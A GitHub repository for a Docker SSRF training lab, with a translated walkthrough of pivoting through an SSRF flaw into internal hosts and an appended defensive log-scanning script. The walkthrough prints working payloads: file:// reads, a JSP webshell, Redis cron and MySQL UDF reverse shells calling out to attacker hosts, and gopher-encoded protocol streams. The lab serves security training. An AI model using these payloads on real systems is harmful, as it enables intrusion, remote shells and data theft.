Repository files (taken from https://raw.githubusercontent.com/Duoduo-chino/ssrf_vul/HEAD/):

├── 图片 (screenshots referenced by the documents below)
├── README.md
├── docker-compose.yml
├── LICENSE
└── 国光老师ssrf靶场通过手册.md
/README.md:

# ssrf_vul

Docker environment for 国光's SSRF lab.

# Starting the environment

```
docker-compose up -d
```

![image-20210621151143989](图片/image-20210621151143989.png)

Open the vulnerable environment:

![image-20210621151258879](图片/image-20210621151258879.png)

# References

- [Github:sqlsec/ssrf-vuls](https://github.com/sqlsec/ssrf-vuls)
- [Github:LS95/gopher-redis-auth](https://github.com/LS95/gopher-redis-auth)
/docker-compose.yml:

```yaml
version: '2'

networks:
  ssrf_v:
    ipam:
      config:
        - subnet: 172.72.23.0/16
          gateway: 172.72.23.1

services:
  ssrfweb1:
    image: registry.cn-hangzhou.aliyuncs.com/jinduoduo/ssrf_web:v1
    ports:
      - 8080:80
    networks:
      ssrf_v:
        ipv4_address: 172.72.23.21

  ssrfweb2:
    image: registry.cn-hangzhou.aliyuncs.com/jinduoduo/ssrf_web:v2
    networks:
      ssrf_v:
        ipv4_address: 172.72.23.22

  ssrfweb3:
    image: registry.cn-hangzhou.aliyuncs.com/jinduoduo/ssrf_web:v3
    networks:
      ssrf_v:
        ipv4_address: 172.72.23.23

  ssrfweb4:
    image: registry.cn-hangzhou.aliyuncs.com/jinduoduo/ssrf_web:v4
    networks:
      ssrf_v:
        ipv4_address: 172.72.23.24

  ssrfweb5:
    image: registry.cn-hangzhou.aliyuncs.com/jinduoduo/ssrf_web:v5
    networks:
      ssrf_v:
        ipv4_address: 172.72.23.25

  ssrfweb6:
    image: registry.cn-hangzhou.aliyuncs.com/jinduoduo/ssrf_web:v6
    networks:
      ssrf_v:
        ipv4_address: 172.72.23.26

  ssrfweb7:
    image: registry.cn-hangzhou.aliyuncs.com/jinduoduo/ssrf_web:v7
    networks:
      ssrf_v:
        ipv4_address: 172.72.23.27
```

/LICENSE:

Apache License
Version 2.0, January 2004
http://www.apache.org/licenses/
/国光老师ssrf靶场通过手册.md:

[TOC]

# Breaking into the intranet with SSRF

# Lab topology

![img](图片/16205694239190.png)

First, let's sort out the attack flow: the web service on port 80 of 172.72.23.21 has an SSRF vulnerability, and port 80 is mapped to port 8080 on the public side. Through port 8080, an attacker can therefore use the SSRF vulnerability to probe and attack the internal 172.x network.

# x.x.x.x:8080 - Determining whether SSRF exists

Anywhere that can make outbound network requests may have SSRF. First look at the target site's function: it takes a snapshot of a site.

![img](图片/16158845554080.png)

Try fetching an external URL first, using the classic Baidu robots.txt as a test:

![img](图片/16158846948365.png)

The test succeeds: the site requested Baidu's robots.txt and echoed the fetched page's content back into its front end. Next, try an internal URL and request 127.0.0.1 to see how it reacts:

![img](图片/16158848092235.png)

This test also succeeds: the site requested port 80 of 127.0.0.1, which is the very page we are browsing, hence the "nested doll" effect in the screenshot. These two requests are enough to confirm that this input box is the SSRF vulnerability point: user input is not filtered, so it can be used to issue arbitrary requests to internal or external hosts.

# 172.72.23.21 - Retrieving local information via SSRF

## Local information via the FILE protocol

Since the site has SSRF, we can try combining it with the file protocol to read local files. Start by reading /etc/passwd:

```
file:///etc/passwd
```
![img](图片/16158852051819.png)

The local file is read successfully. Now try to find the internal IP address of the vulnerable host itself, to confirm which network segment it is on:

```
file:///etc/hosts
```

![img](图片/16158853012234.png)

The machine's internal address is **172.23.23.21**, so the next step is information gathering on that internal segment.

> With sufficient privileges you can also try reading `/proc/net/arp` or `/etc/network/interfaces` to learn more about the machine's network setup.

# 172.72.23.1/24 - Probing internal ports via SSRF

SSRF is often combined with the DICT protocol to probe which internal ports are open. Not every port can be detected this way; in general only services that send something back over TCP show up. In Burp, use Intruder's iterator mode, set the IPs and ports to brute-force, and it enumerates the open ports in bulk:

![img](图片/16205718285870.png)

The brute-force results give the following open ports:

```none
172.72.23.21 - 80
172.72.23.22 - 80
172.72.23.23 - 80、3306
172.72.23.24 - 80
172.72.23.25 - 80
172.72.23.26 - 8080
172.72.23.27 - 6379
172.72.23.28 - 6379
172.72.23.29 - 3306
```

Compared against the topology diagram, the open ports match one to one. Reconnaissance is complete, so now let's go through the intranet using only the outermost SSRF.

Besides probing ports with DICT, plain HTTP can be used to gather information about the web applications inside the network; that is not repeated here.

# 172.72.23.22 - Code injection

## The code injection application

This part is the god's-eye view: it shows readers what the application's normal functionality looks like, so that the later attack through SSRF is easier to follow.

- **index.php**

  A plain notice page with nothing on it:

  ![img](图片/16159507909051.png)

- **phpinfo.php**

  Included to make up the numbers; it barely counts as a sensitive file:

  ![img](图片/16159507356928.png)

- **shell.php**

  A classic one-line `system` webshell:

  ![img](图片/16159508482777.png)

## Directory scanning via SSRF

Using the SSRF vulnerability to directory-scan internal web assets is awkward with conventional tools such as dirsearch. Instead, capture the request in Burp Suite, load a wordlist and iterate over the path parameter in bulk. The request looks like this:

![img](图片/16158992187949.png)

Burp Suite's built-in Grep - Extract quickly filters the responses by regex match; clearly the internal site at 172.72.23.22 also has phpinfo.php and shell.php:

![img](图片/16158995732548.png)

## Code injection via SSRF

Because this one-line webshell accepts requests via GET, the SSRF can issue a GET request over plain HTTP, passing the command in the cmd parameter, and it executes directly:

![img](图片/16159444802587.png)

When submitting the request from a browser, spaces must be written as `%20` for the command to execute:

![img](图片/16158999618923.png)

The contents of the hosts file show that we now have control of the internal machine 172.72.23.22.

If the request is sent from Burp, spaces must be written as `%2520`, i.e. URL-encoded twice, for the command to execute:

![img](图片/16159022268572.png)

# 172.72.23.23 - SQL injection

## The SQL injection application

This part is the god's-eye view: it shows readers what the application's normal functionality looks like, so that the later attack through SSRF is easier to follow.

A basic UNION-based injection that returns database information directly:

![img](图片/16159446329950.png)

![img](图片/16159509711131.png)

A flag is also pre-seeded, and the same UNION query retrieves its value:

![img](图片/16159447676123.png)

![img](图片/16159434785930.png)

Because the administrator (国光) accidentally (deliberately) set 777 permissions on the web root, MySQL's `INTO DUMPFILE` can be used to write a shell directly into the web directory. The UNION-injection payload that executes the shell-writing SQL statement is as follows:

![img](图片/16159511969112.png)

After the shell is written, open it in the browser and run a command:

![img](图片/16159512533721.png)

## SQL injection via SSRF

Using SSRF to inject into an internal asset with SQLi is much like the GET-based case in the previous section; just pay attention to a few encoding details.

The basic UNION-based injection through SSRF returns the database information just as a normal injection does; the only difference is that spaces must be **URL-encoded twice**:

![img](图片/16159471386687.png)

![img](图片/16159472149209.png)

Likewise, the flag in the database is extracted directly:

![img](图片/16159482716992.png)

Writing a shell into the web directory via the SQL statement:

![img](图片/16159486112615.png)

After the shell is written, try executing a command directly:

![img](图片/16159487947826.png)

![img](图片/16159488236844.png)

# 172.72.23.24 - Command execution

## The command execution application

This part is the god's-eye view: it shows readers what the application's normal functionality looks like, so that the later attack through SSRF is easier to follow.

172.72.23.24 hosts a classic command execution flaw: via POST, an attacker can append Linux command separators to the ip parameter, leading to arbitrary command execution:

![img](图片/16159595617894.png)

## Command execution via SSRF

This scenario differs slightly from the previous ones. The code injection and SQL injection were both attacked by passing parameters via GET, but this command execution is triggered via POST, and the SSRF cannot send POST data over the HTTP protocol. In such cases the gopher protocol is generally used to issue the POST request to the internal application. The basic gopher request format is:

![img](图片/16159601558925.png)

gopher is an old but powerful protocol. As the request format shows, it can carry a raw TCP data stream, and since HTTP also runs over TCP, sending an HTTP POST request through gopher is trivial.

First capture a normal POST request and delete this line from the HTTP request:

```payload
Accept-Encoding: gzip, deflate
```

> If it is not removed, the response to the SSRF request comes back garbled, because it has been gzip-encoded twice.

Then URL-encode the POST packet twice in Burp Suite:

![img](图片/16159620724415.png)

The twice-URL-encoded data is the final TCP stream; the complete SSRF attack request carrying the POST data looks like this:

![img](图片/16159622165771.png)

The SSRF attack against the command execution web app on 172.72.23.24 succeeds and runs `cat /etc/hosts`:

![img](图片/16159623108967.png)

# 172.72.23.25 - XML external entity injection

## The XXE application

This part is the god's-eye view: it shows readers what the application's normal functionality looks like, so that the later attack through SSRF is easier to follow.

This is a basic XXE (XML external entity) scenario: on login the user submits XML data, the back end parses it and outputs the result, so an XXE payload can be constructed to read sensitive local information:

![img](图片/161596409182.png)

The XXE attack in action:

![img](图片/16159641814811.png)

## XXE via SSRF

As with the command execution on 172.72.23.24, the XXE payload goes in the POST body, so again capture a normal XXE POST request, delete the `Accept-Encoding` line, and URL-encode the POST packet twice in Burp Suite:

![img](图片/1615964526544.png)

The twice-URL-encoded data is the final TCP stream; the complete SSRF attack request carrying the POST data looks like this:

![img](图片/16159645952337.png)

The SSRF attack against the XXE web app on 172.72.23.25 succeeds and runs `cat /etc/hosts`:

![img](图片/16159647944294.png)

# 172.72.23.26 - CVE-2017-12615

## The Tomcat application

This scenario is a Tomcat server with the CVE-2017-12615 arbitrary file write vulnerability, one of the classic bugs in Tomcat's history. 国光 won't go over it again here; readers who have not reproduced it can use the vulhub lab: [Tomcat PUT method arbitrary file write (CVE-2017-12615)](https://github.com/vulhub/vulhub/blob/master/tomcat/CVE-2017-12615/README.zh-cn.md)

## CVE-2017-12615 via SSRF

This is similar to the previous scenarios, so 国光 keeps this part brief. Prepare a one-line JSP shell:

```java
<%
    String command = request.getParameter("cmd");
    if(command != null)
    {
        java.io.InputStream in=Runtime.getRuntime().exec(command).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1)
        {
            out.println(new String(b));
        }
        out.print("</pre>");
    } else {
        out.print("format: xxx.jsp?cmd=Command");
    }
%>
```

Take the original attack POST packet:

![img](图片/16159678892175.png)

URL-encode this POST request twice and send it through the SSRF; a 201 status code means the shell was written:

![img](图片/16159680654495.png)

Then issue an HTTP request to shell.jsp via the SSRF, which runs `cat /etc/hosts`:

![img](图片/16159683314157.png)

# 172.72.23.27 - Unauthenticated Redis

## The Redis unauth application

Port 6379 on the internal host 172.72.23.27 runs an unauthenticated Redis service. The system has no web service (so no webshell can be written) and no SSH key authentication (so no public key can be written), which leaves cron jobs as the only attack path. The main commands of the standard approach are:

```bash
# clear all keys
flushall

# set the working directory to the cron directory
config set dir /var/spool/cron/

# set the dump filename so the cron entry belongs to root
config set dbfilename root

# set the cron job contents
set x "\n* * * * * /bin/bash -i >& /dev/tcp/x.x.x.x/2333 0>&1\n"

# save
save
```

## Redis unauth via SSRF

In an SSRF attack you cannot use redis-cli to connect to Redis; without authentication, either the dict or the gopher protocol can be used. Because constructing gopher payloads is tedious, DICT is recommended for this scenario as it is far more efficient. Besides probing ports, another trick of the DICT protocol is attacking unauthenticated Redis services, in the following format:

```bash
dict://x.x.x.x:6379/
```

![img](图片/16159716703465.png)

Sending a DICT request through the SSRF returns Redis's output for the info command. Now use dict directly to create the cron job for a reverse shell:

```bash
# clear all keys
dict://172.72.23.27:6379/flushall

# set the working directory to the cron directory
dict://172.72.23.27:6379/config set dir /var/spool/cron/

# create root's cron file in the cron directory
dict://172.72.23.27:6379/config set dbfilename root

# write the bash reverse shell payload
dict://172.72.23.27:6379/set x "\n* * * * * /bin/bash -i >%26 /dev/tcp/x.x.x.x/2333 0>%261\n"

# save the above
dict://172.72.23.27:6379/save
```

> When sending through the SSRF, remember to URL-encode `&` as `%26`. The above is best done from a captured request in Burp, so the browser does not mangle the encoding in transit.

![img](图片/16205798556776.png)

Once the cron job is created on the target, the shell comes back; `cat /etc/hosts` confirms it is the internal machine 172.72.23.27:

![img](图片/1620373632443.png)

# 172.72.23.28 - Authenticated Redis

## The Redis auth application

This part is the god's-eye view: it shows readers what the application's normal functionality looks like, so that the later attack through SSRF is easier to follow.

Host 172.72.23.28 runs Redis, but it requires a password, so commands cannot be executed without authenticating:

![img](图片/16203786039801.png)

Besides 6379, port 80 is also open, hosting a classic LFI (local file inclusion) that can be used to read local files:

![img](图片/16203790367605.png)

The Redis password is stored in the redis.conf configuration file, so use the file inclusion to read it. Common Redis configuration file paths:

```payload
/etc/redis.conf
/etc/redis/redis.conf
/usr/local/redis/etc/redis.conf
/opt/redis/ect/redis.conf
```

`/etc/redis.conf` is read successfully; search for the `requirepass` keyword to locate the password:

![img](图片/1620379158609.png)

With the password, normal interaction with Redis is possible:

![img](图片/16203793021008.png)

## Redis auth via SSRF

First obtain the Redis password through the file inclusion on the target's port 80: P@ssw0rd

![img](图片/16203795678307.png)

With the password in hand, first try authenticating over the dict protocol:

![img](图片/16203796537306.png)

But because dict does not support multiple commands in one request, nothing can be executed after the authentication, so in principle the dict protocol cannot attack an authenticated Redis service.

That leaves our old friend, the gopher protocol. Since gopher needs the raw packets, we have to capture Redis request traffic, which can be done locally with the socat command:

```bash
socat -v tcp-listen:4444,fork tcp-connect:127.0.0.1:6379
```

Now connect redis-cli to local port 4444:

```bash
➜ ~ redis-cli -h 127.0.0.1 -p 4444
127.0.0.1:4444>
```

socat accepts the traffic on port 4444 and forwards it to port 6379; after authenticating, write the shell into the web directory:

```bash
# authenticate to redis
127.0.0.1:4444> auth P@ssw0rd
OK

# clear all keys
127.0.0.1:4444> flushall

# set the working directory to the web root
127.0.0.1:4444> config set dir /var/www/html

# create shell.php in the web directory
127.0.0.1:4444> config set dbfilename shell.php

# set the contents of shell.php
127.0.0.1:4444> set x "\n\n"

# save the above
127.0.0.1:4444> save
```

Meanwhile socat shows the packets in detail; the key traffic is recorded below:

![img](图片/16203835195059.png)

The Redis traffic is not hard to understand; follow the orange annotations in the screenshot. The key request data, tidied up, is as follows:

```payload
*2\r
$4\r
auth\r
$8\r
P@ssw0rd\r
*1\r
$8\r
flushall\r
*4\r
$6\r
config\r
$3\r
set\r
$3\r
dir\r
$13\r
/var/www/html\r
*4\r
$6\r
config\r
$3\r
set\r
$10\r
dbfilename\r
$9\r
shell.php\r
*3\r
$3\r
set\r
$1\r
x\r
$25\r


\r
*1\r
$4\r
save\r
```

Each line ends with `\r`, but the Redis protocol terminates lines with CRLF (`\r\n`), so during conversion `\r` must become `\r\n`; then everything is URL-encoded twice, which Burp handles easily:

![img](图片/16203839384264.png)

Finally submit it at the SSRF vulnerability point:

![img](图片/16203841323189.png)

If it succeeds, shell.php is written to the /var/www/html web root with password 1. Now try it through the SSRF:

```payload
http://172.23.23.28/shell.php?1=phpinfo();
```

![img](图片/16203841954734.png)

Shell obtained. Take a moment to digest that; next, let's use SSRF to attack the MySQL service.

# 172.72.23.29 - Unauthenticated MySQL

## The MySQL application

MySQL allows login with an empty password. The lab places one flag in the database and one on the system; SSRF can interact with the database, and a UDF privilege escalation via SSRF gets the system flag:

![img](图片/16204652496250.png)

## Unauthenticated MySQL via SSRF

### Capturing the raw packets

When MySQL requires a password, the server first sends a salt, the client hashes the password with it and the server verifies the result; when no password is required, the TCP/IP packets can simply be replayed. That is why SSRF can attack MySQL directly in this case. Since a gopher attack needs the raw TCP packets of the MySQL request, as with Redis we use tcpdump to capture the raw authentication packets on 3306:

```bash
# lo is the loopback interface; -w writes the capture to a pcapng file
tcpdump -i lo port 3306 -w mysql.pcapng
```

Then run some test queries locally with the MySQL client:

```mysql
$ mysql -h127.0.0.1 -uroot -e "select * from flag.test union select user(),'www.sqlsec.com';"
+----------------+----------------------------------------+
| id             | flag                                   |
+----------------+----------------------------------------+
| 1              | flag{71***************************316} |
| root@127.0.0.1 | www.sqlsec.com                         |
+----------------+----------------------------------------+
```

Stop tcpdump, open `mysql.pcapng` in Wireshark, follow the TCP stream and filter for the data sent to 3306:

![img](图片/16204668042945.png)

Save it as raw data (Show data as `Raw`) and collapse it into a single line.

### Generating the gopher stream

Then convert the data to URL encoding with the following Python 3 script:

```python
import sys


def results(s):
    # split the hex string into two-character bytes and prefix each with %
    a = [s[i:i + 2] for i in range(0, len(s), 2)]
    return "curl gopher://127.0.0.1:3306/_%" + "%".join(a)


if __name__ == "__main__":
    s = sys.argv[1]
    print(results(s))
```

Running it:

![img](图片/16204671626680.png)

### Querying the database via SSRF

Send this gopher request locally with curl:

![img](图片/16204672777528.png)

As the screenshot shows, the gopher request executed successfully: both user() and the flag in the database were returned.

If curl complains that the output is binary and cannot be shown directly, use `--output` to write it to a file and cat the file to see the result of the gopher/MySQL exchange:

```bash
$ curl gopher://127.0.0.1:3306/_xxx --output mysql_result
```

### MySQL privilege escalation via SSRF

Merely querying data through an SSRF attack on MySQL is of limited use; a UDF privilege escalation followed by a reverse shell is far more direct. Below, SSRF is used to perform a UDF escalation against the internal MySQL. For more detail on MySQL see my earlier article [MySQL exploitation and privilege escalation](https://www.sqlsec.com/2020/11/mysql.html).

First find MySQL's plugin directory; the native MySQL command is:

```bash
$ mysql -h127.0.0.1 -uroot -e "show variables like
'%plugin%';"
```

With tcpdump listening, analyze the capture in Wireshark and export the raw data:

![img](图片/16204676811766.png)

Convert the raw data to gopher with the script, giving:

```bash
curl gopher://127.0.0.1:3306/_%a2%00%00%01%85%a2%3f%00%00%00%00%01%08%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%65%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%04%33%35%35%34%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%36%2e%35%31%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%21%00%00%00%03%73%65%6c%65%63%74%20%40%40%76%65%72%73%69%6f%6e%5f%63%6f%6d%6d%65%6e%74%20%6c%69%6d%69%74%20%31%20%00%00%00%03%73%68%6f%77%20%76%61%72%69%61%62%6c%65%73%20%6c%69%6b%65%20%0a%27%25%70%6c%75%67%69%6e%25%27%01%00%00%00%01
```

When sending it from Burp, remember to URL-encode it a second time; the plugin directory comes straight back:

![img](图片/16204679134706.png)

MySQL's plugin directory is `/usr/lib/mysql/plugin/`.

Next, write the shared library; the native MySQL command is:

```bash
# the payload is too long for -e, so open the MySQL console first
$ mysql -h127.0.0.1 -uroot

MariaDB [(none)]> SELECT 0x7f454c460...<large payload omitted>...0000000 INTO DUMPFILE '/usr/lib/mysql/plugin/udf.so';
```

> For the UDF statements used in this escalation, see 国光's UDF helper page: [MySQL UDF privilege escalation hex lookup | 国光](https://www.sqlsec.com/tools/udf.html)

Capture the raw data with tcpdump, convert it to gopher, and write the shared library through the SSRF. Because this gopher payload is very long, Burp may hang in the Waiting state:

![img](图片/16204695776705.png)

That is not a problem; udf.so has in fact been written to MySQL's plugin directory:

![img](图片/16204695857520.png)

In the same way, create the user-defined function:

```bash
$ mysql -h127.0.0.1 -uroot -e "CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';"
```

Finally, use the created function to run a system command and get the reverse shell; the native command is:

```bash
$ mysql -h127.0.0.1 -uroot -e "select sys_eval('echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4yMTEuNTUuMi8yMzMzIDA+JjE=|base64 -d|bash -i')"
```

Because in testing the shell would not come back by default, the original bash reverse-shell command is encoded here:
![img](图片/16204701072416.png)

This encoding is simply Base64 done in JS, imitating that well-known site abroad: [安全小公举 | 国光](https://www.sqlsec.com/tools.html)

Capture the raw data with tcpdump, convert it to gopher, URL-encode it a second time in Burp and send it; the SSRF attack pops the shell:

![img](图片/16204703947056.png)

# Lab source code

Source: 国光
Article link: https://www.sqlsec.com/2021/05/ssrf.html
Ahem~ trying to freeload the article again? Copyright of this article belongs to the author; any form of reposting must credit the source.
--------------------------------------------------------------------------------
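For the defending side, an added example (not from the write-up or the lab) of what the probes above look like in the vulnerable host's own access log: it decodes the fetch parameter (assumed to be named `url`) through nested URL encoding and flags non-HTTP schemes, internal targets and the double-encoded payloads used throughout the walkthrough. The log lines are constructed, and the 172.72.23.0/24 entry is again an assumption standing in for the site's own ranges.

```python
import ipaddress
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache-style access-log lines for the snapshot endpoint of the
# lab's vulnerable host; the parameter name "url" is an assumption.
SAMPLE_LOG = """\
198.51.100.7 - - [13/Mar/2021:10:01:02 +0800] "GET /?url=http%3A%2F%2Fwww.baidu.com%2Frobots.txt HTTP/1.1" 200 512
198.51.100.7 - - [13/Mar/2021:10:01:09 +0800] "GET /?url=http%3A%2F%2F127.0.0.1%2F HTTP/1.1" 200 2048
198.51.100.7 - - [13/Mar/2021:10:02:30 +0800] "GET /?url=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1" 200 1423
198.51.100.7 - - [13/Mar/2021:10:05:11 +0800] "GET /?url=dict%3A%2F%2F172.72.23.27%3A6379%2Finfo HTTP/1.1" 200 3010
198.51.100.7 - - [13/Mar/2021:10:07:45 +0800] "GET /?url=http://172.72.23.22/shell.php?cmd=cat%2520/etc/hosts HTTP/1.1" 200 300
203.0.113.4 - - [13/Mar/2021:10:09:00 +0800] "GET /static/logo.png HTTP/1.1" 200 8000
"""
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<path>\S+) [^"]*" \d+')
RISKY_SCHEMES = {"file", "dict", "gopher", "ftp", "ldap"}
INTERNAL_NETS = [ipaddress.ip_network("172.72.23.0/24")]  # lab range, not RFC 1918 (assumed)

def decode_layers(value, max_layers=3):
    """Strip nested URL encoding; returns (decoded, number of extra layers found)."""
    layers = 0
    while layers < max_layers and unquote(value) != value:
        value, layers = unquote(value), layers + 1
    return value, layers

def host_is_internal(host):
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:                 # a name: only the obvious alias is handled here
        return host.lower() == "localhost"
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or any(ip in net for net in INTERNAL_NETS))

def inspect_line(line, param="url"):
    """Parse one log line; returns a dict whose "reasons" say why it looks like a probe."""
    m = LOG_RE.match(line)
    if not m or "?" not in m.group("path"):
        return None
    values = parse_qs(m.group("path").split("?", 1)[1], keep_blank_values=True).get(param)
    if not values:
        return None
    target, extra = decode_layers(values[0])     # parse_qs already removed one layer
    parts = urlsplit(target)
    reasons = []
    if parts.scheme.lower() in RISKY_SCHEMES:
        reasons.append(f"scheme:{parts.scheme.lower()}")
    if parts.hostname and host_is_internal(parts.hostname):
        reasons.append(f"internal-host:{parts.hostname}")
    if extra:                                     # %2520-style payloads from the walkthrough
        reasons.append(f"double-encoded:{extra}")
    return {"src": m.group("src"), "ts": m.group("ts"), "target": target, "reasons": reasons}

def find_ssrf_probes(log_text, param="url"):
    """Return the entries whose fetch target looks like an SSRF probe."""
    hits = []
    for line in log_text.splitlines():
        result = inspect_line(line, param)
        if result and result["reasons"]:
            hits.append(result)
    return hits
```

Names that resolve to internal addresses are not caught by a log-only check; pair it with the resolver-based validation on the server itself.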